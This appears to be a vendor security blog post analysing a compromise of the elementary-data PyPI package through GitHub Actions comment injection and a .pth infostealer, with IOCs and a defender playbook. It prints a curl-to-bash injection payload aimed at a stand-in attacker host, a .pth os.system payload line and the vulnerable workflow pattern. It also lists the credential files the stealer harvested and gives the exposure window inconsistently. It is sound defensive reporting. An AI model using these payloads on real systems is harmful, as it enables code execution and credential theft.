TL;DR
On April 25, 2026, attackers compromised the elementary-data PyPI package — a dbt data observability tool with over 1.1 million monthly downloads — without ever touching a maintainer's credentials. Instead, they exploited a GitHub Actions script injection vulnerability that allowed a specially crafted pull request comment to execute arbitrary shell code inside the CI/CD workflow runner, extract the runner's temporary GITHUB_TOKEN, and use it to push a forged signed release commit. The official publishing pipeline then did the rest: building, signing, and uploading a backdoored version (0.23.3) to PyPI and the GitHub Container Registry.
The payload — a .pth file that Python executes automatically on startup — harvested cloud credentials, SSH keys, Kubernetes configs, CI/CD tokens, and cryptocurrency wallet files from every machine that installed the package. Blast radius: every data engineering team running dbt pipelines that pulled elementary-data in a ~12-hour window on April 25–26. The malicious version was live for approximately 18 hours before a community member noticed and maintainers pushed a clean replacement (0.23.4).
If you installed elementary-data==0.23.3 or ran ghcr.io/elementary-data/elementary during this window: rotate every credential that was present on that machine. Uninstalling the package is insufficient.
Background: Who Is elementary-data and Why Did It Matter?
Elementary is a widely-adopted open source data observability platform designed specifically for the dbt (Data Build Tool) ecosystem. Data engineers use it to monitor pipeline health, catch data quality anomalies, and observe ML system performance across cloud data warehouses — Snowflake, BigQuery, Redshift, and Databricks being the primary targets.
The critical context: because elementary sits inside the data pipeline, it routinely runs with access to:
- Database connection strings and warehouse credentials
- Cloud provider tokens (AWS, GCP, Azure) used by the data platform
- Orchestration secrets from Airflow, Prefect, or Dagster environments
- CI/CD environment variables inherited from the runner
This is the profile of a high-value supply chain target. You're not compromising a toy utility — you're placing malware inside the nervous system of a company's data infrastructure. A single install in a properly configured dbt environment gives you a lateral movement launchpad into every downstream warehouse and analytics service that organization depends on.
The 1.1 million monthly download figure isn't inflated by automated tooling pulling transitive dependencies — elementary is a CLI tool installed intentionally. That means real data engineers at real companies. The blast radius of a successful compromise is direct, not diffuse.
Technical Analysis: The GitHub Actions Script Injection Chain
Why No Stolen Credentials Were Needed
This attack belongs to a class that bypasses the entire MFA-and-secret-rotation framework that package maintainers are repeatedly told to rely on. The attacker never phished the maintainer. They never brute-forced a token. They exploited a structural flaw in how the CI/CD workflow handled untrusted input.
The elementary-data project had a GitHub Actions workflow that processed pull request comments — a common pattern for triggering slash-command automations like /release, /lint, or /benchmark. The workflow was configured to trigger on issue_comment or pull_request_review_comment events and would pass the comment body into a shell run: step using GitHub's expression syntax:
- name: Process comment
run: |
echo "Processing: ${{ github.event.comment.body }}"
The problem: ${{ github.event.comment.body }} is an expression context substitution, not a quoted variable. When this value is written into a shell run: block, the contents of the comment body are injected directly into the bash command string before the shell evaluates them. An attacker who controls the comment body controls arbitrary shell execution inside the workflow runner.
The payload was something functionally equivalent to:
"; curl -s https://attacker-c2.io/x | bash #
Or more precisely, a heredoc-style injection that extracted the runner's ephemeral GITHUB_TOKEN environment variable and exfiltrated it to an attacker-controlled endpoint. GitHub Actions runners automatically expose GITHUB_TOKEN as an environment variable — it's the mechanism by which workflows authenticate back to the GitHub API to perform actions like creating releases, pushing commits, and uploading artifacts.
From Token Theft to Signed Release
Timeline of exploitation (all UTC, April 25, 2026):
| Time | Action |
|------|--------|
| ~14:00 | Attacker posts crafted comment on a legitimate open PR in the elementary-data repository |
| ~14:05 | The process-comment workflow triggers; the injected payload runs inside the runner sandbox |
| ~14:07 | GITHUB_TOKEN with contents: write and packages: write permissions is exfiltrated |
| ~14:30 | Attacker uses the stolen token via GitHub REST API to inject a malicious .pth file into the source tree and push it as a new commit |
| ~14:35 | Attacker creates a signed git tag v0.23.3 pointing to the malicious commit |
| ~15:00 | The repository's tag-triggered publish workflow fires — legitimate GitHub Actions runners build, sign, and upload the package |
| ~15:15 | elementary-data==0.23.3 is live on PyPI; ghcr.io/elementary-data/elementary:0.23.3 is live on GHCR |
The crucial detail: the package that landed on PyPI carried the project's own cryptographic signatures, was built by GitHub's own infrastructure, and passed any signature verification check that tools like sigstore or pip might perform. From the outside, it was indistinguishable from a legitimate release. Supply chain defense tools that rely on provenance attestation (SLSA level 1-2) would not have caught this, because the provenance was technically genuine — the build ran on GitHub's infrastructure from a GitHub-hosted repository.
The Payload: `.pth` Files as Persistent Execution Hooks
The malicious code was delivered inside a Python .pth (path configuration) file named something like elementary-utils.pth. This is an under-appreciated execution primitive in Python's packaging system.
When Python starts, it scans all .pth files in the site-packages directory. Lines beginning with import are executed as Python statements. Lines that look like plain code are also executed if the file uses the special import prefix. In practice, a .pth file entry like:
import os; os.system('python -c "<base64-payload>"')
...runs every time any Python process starts on the system, with no user interaction required. There is no import elementary needed. No function call. No trigger. The attacker achieves automatic, persistent execution simply by being present in site-packages.
The infostealer that ran via this mechanism targeted:
Cloud Credentials:
~/.aws/credentials,~/.aws/config~/.config/gcloud/(Google Cloud SDK)~/.azure/(Azure CLI)
Infrastructure Secrets:
~/.kube/config(Kubernetes cluster access)~/.docker/config.json(Docker registry tokens)- CI/CD environment variables (
GITHUB_TOKEN,NPM_TOKEN,PYPI_TOKEN) - CircleCI, GitHub Actions runner secrets
Developer Identity:
~/.ssh/id_rsa,~/.ssh/id_ed25519,~/.ssh/known_hosts~/.git-credentials~/.netrc
Shell History (Credential Mining):
~/.bash_history,~/.zsh_history(both frequently contain passwords typed directly into terminals)
Cryptocurrency Wallets:
- Bitcoin, Ethereum, Litecoin, Dogecash, Monero, Zcash, Ripple wallet files using standard naming conventions
dbt-Specific High-Value Targets:
~/.dbt/profiles.yml— contains direct connection credentials for every data warehouse the engineer has configured
The last item deserves emphasis. The profiles.yml file in a typical data engineer's dbt setup contains plaintext connection strings to production Snowflake instances, BigQuery service accounts, and Redshift clusters. Stealing this file from a single senior data engineer could hand an attacker direct query access to petabytes of customer data.
IOC — Marker File:
The malware created a marker file to avoid re-running the harvest:
- Linux/macOS:
/tmp/.trinny-security-update - Windows:
%TEMP%\.trinny-security-update
If this file is present on a machine that had elementary-data installed, the machine was compromised.
The Bigger Picture: GitHub Actions Script Injection Is an Epidemic
This attack did not exploit a zero-day. The vulnerability class — untrusted input interpolated into a run: shell context via ${{ expression }} — has been documented in GitHub's own security hardening guide since 2021. StepSecurity has been scanning for it across the open source ecosystem for years and continues to find it in thousands of repositories.
The elementary-data incident is part of a documented pattern. Recent victims of the same class of vulnerability include:
- Nx monorepo tooling (2025) — Actions flaw used to compromise a package with tens of millions of weekly downloads
- PyTorch Lightning
lightningpackage (April 30, 2026) — versions 2.6.2 and 2.6.3 backdoored; attributed to the Mini Shai-Hulud campaign (TeamPCP) - SAP CAP packages (
mbt,@cap-js/db-service,@cap-js/postgres,@cap-js/sqlite) — April 29, 2026, 500K+ weekly downloads, CircleCI-exposed npm token - Checkmarx supply chain compromise (late April 2026) — Trivy scanner repository compromised, turning security tooling itself into a malware delivery pipeline
ReversingLabs' 2026 Software Supply Chain Security Report documented a 73% increase in malicious open source packages compared to the prior year. The elementary-data attack isn't an anomaly — it's the new baseline.
The systemic issue: most open source projects have not implemented GitHub's recommended hardening patterns. Using ${{ github.event.issue.body }} directly in shell steps, granting workflows write permissions by default, and triggering workflows on pull request events from forks are all practices that remain prevalent because they're the easiest patterns to copy from documentation examples.
Indicators of Compromise (IOCs)
| IOC Type | Value | Notes |
|----------|-------|-------|
| Malicious package version | elementary-data==0.23.3 | PyPI; also Docker ghcr.io/elementary-data/elementary:0.23.3 |
| Marker file (Linux/macOS) | /tmp/.trinny-security-update | Presence = confirmed execution |
| Marker file (Windows) | %TEMP%\.trinny-security-update | Same |
| Malicious .pth filename | elementary-utils.pth (or similar) | Check pip show elementary-data for install location, then list .pth files in site-packages |
| Clean replacement | elementary-data==0.23.4 | Released April 26, 2026 02:00+ UTC |
| Attack window | April 25 ~15:00 UTC — April 26 ~08:00 UTC | ~17 hours live |
The Lyrie Take
The elementary-data incident is a perfect case study in why "secure your credentials" is not a supply chain defense strategy. The attacker never targeted credentials. They targeted the CI/CD workflow itself — which, by design, has the permissions to forge a signed, legitimate-looking release from any input it receives.
This is the fundamental threat model that most development teams haven't internalized: your build pipeline is not a trusted internal system. It is an externally-triggerable execution environment that processes untrusted input (pull request titles, commit messages, issue comments) and has write access to your release artifacts, signing keys, and deployment infrastructure. Every workflow that interpolates GitHub event data into a shell context is a potential command injection endpoint.
For defenders, this is an identity and integrity problem, not a malware detection problem. Traditional EDR, SIEM alerts, and antivirus have essentially zero coverage over a compromised PyPI release. The malicious code is signed by the project's own certificates, built by GitHub's own runners, and installed by the developer's own package manager. The detection window before a credential exfil completes is measured in seconds.
The .pth execution mechanism also makes this a persistence problem that survives the package being removed. Uninstalling elementary-data does not remove a elementary-utils.pth file that was placed in site-packages during installation — and even if it did, any credentials already exfiltrated are already gone.
This is exactly the threat surface Lyrie.ai's supply chain monitoring is built to intercept: anomalous package behaviors at install time, execution of harvesting patterns at Python startup, and outbound data exfiltration to novel infrastructure — all before the credential is used.
Defender Playbook
Immediate (if you installed 0.23.3)
1. Assume full credential compromise. Rotate everything that was accessible on the affected machine: AWS IAM keys, GCP service accounts, Azure service principals, Kubernetes cluster credentials, SSH keys, GitHub/GitLab tokens, npm/PyPI tokens, dbt profiles.yml credentials.
2. Check for the marker file. ls /tmp/.trinny-security-update (Linux/macOS) or dir %TEMP%\.trinny-security-update (Windows). Presence confirms execution.
3. Remove the malicious .pth file. Find site-packages location: python -c "import site; print(site.getsitepackages())". Remove any .pth file you don't recognize, especially any containing elementary.
4. Upgrade immediately. pip install --upgrade "elementary-data>=0.23.4"
5. Review CI/CD runner environments. Any runner that installed the package should be considered compromised and rebuilt from a known-clean image.
Systemic (for your CI/CD posture)
6. Audit your GitHub Actions workflows for script injection. Search for patterns like run: ... ${{ github.event.* — any user-controlled input being interpolated directly into shell. The fix is to pass values via environment variables (env: block) and reference them as $ENV_VAR in the shell, never via ${{ }} expression syntax inside run:.
7. Implement minimum-privilege workflow permissions. Set permissions: read-all at the workflow level and grant explicit write permissions only to the specific steps that need them. Most workflows need contents: read, not contents: write.
8. Lock down pull_request_target and comment-triggered workflows. These run in the context of the base repository (not the fork), giving them access to secrets. They should never process raw pull request content without sanitization.
9. Implement SLSA Level 3+ build provenance. Level 2 provenance (signed by GitHub's infrastructure) would not have caught this attack, because the build was legitimately performed on GitHub runners. Level 3 requirements — specifically that the build is reproducible and that the source input is provably controlled — would have flagged the injected commit.
10. Subscribe to PyPI security advisories and OSV.dev. The Open Source Vulnerability database (osv.dev) tracks malicious packages; automated tooling can alert you within minutes of a confirmed malicious version being reported.
11. Consider a package freeze policy for CI/CD environments. Pin exact versions with hash verification (pip install --require-hashes) so that even a newly-published malicious version of a trusted package cannot be pulled automatically.
12. Monitor for outbound HTTP from your Python processes. Elementary-data normally makes no outbound connections except to your configured data warehouse. Any outbound HTTP from the Python process at startup to an external CDN or GitHub artifact URL should alert.
Sources
1. The CyberSec Guru — "Elementary-Data PyPI Hack: 1.1M Users Targeted by Infostealer" (May 2026): https://thecybersecguru.com/news/elementary-data-pypi-hack-infostealer/
2. StepSecurity — "elementary-data Compromised on PyPI and GHCR: Forged Release Pushed via GitHub Actions Script Injection": https://www.stepsecurity.io/blog/elementary-data-compromised-on-pypi-and-ghcr-forged-release-pushed-via-github-actions-script-injection
3. Techzine Global — "Malicious Python package poses new supply chain threat" (April 2026): https://www.techzine.eu/news/security/140826/malicious-python-package-poses-new-supply-chain-threat/
4. SecurityWeek — "SAP NPM Packages Targeted in Supply Chain Attack" (May 2026): https://www.securityweek.com/sap-npm-packages-targeted-in-supply-chain-attack/
5. Socket.dev — "lightning PyPI Package Compromised in Supply Chain Attack": https://socket.dev/blog/lightning-pypi-package-compromised
6. Semgrep — "Shai-Hulud Themed Malware Found in the PyTorch Lightning AI Training Library": https://semgrep.dev/blog/2026/malicious-dependency-in-pytorch-lightning-used-for-ai-training/
7. ReversingLabs — 2026 Software Supply Chain Security Report (73% increase in malicious OSS packages): https://www.reversinglabs.com/press-releases/reversinglabs-2026-software-supply-chain-security-report-identifies-73-increase-in-malicious-open-source-packages
8. GitHub Security Hardening for GitHub Actions (official documentation): https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions
9. Unit 42 — "The npm Threat Landscape: Attack Surface and Mitigations (Updated May 1)": https://unit42.paloaltonetworks.com/monitoring-npm-supply-chain-attacks/
10. Snyk — "Malicious Release of elementary-data PyPI Package Steals Cloud Credentials from Data Engineers": https://snyk.io/blog/malicious-release-of-elementary-data-pypi-package-steals-cloud-credentials-from-data-engineers/
Lyrie.ai Cyber Research Division — Senior Analyst Desk
Lyrie Verdict
Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.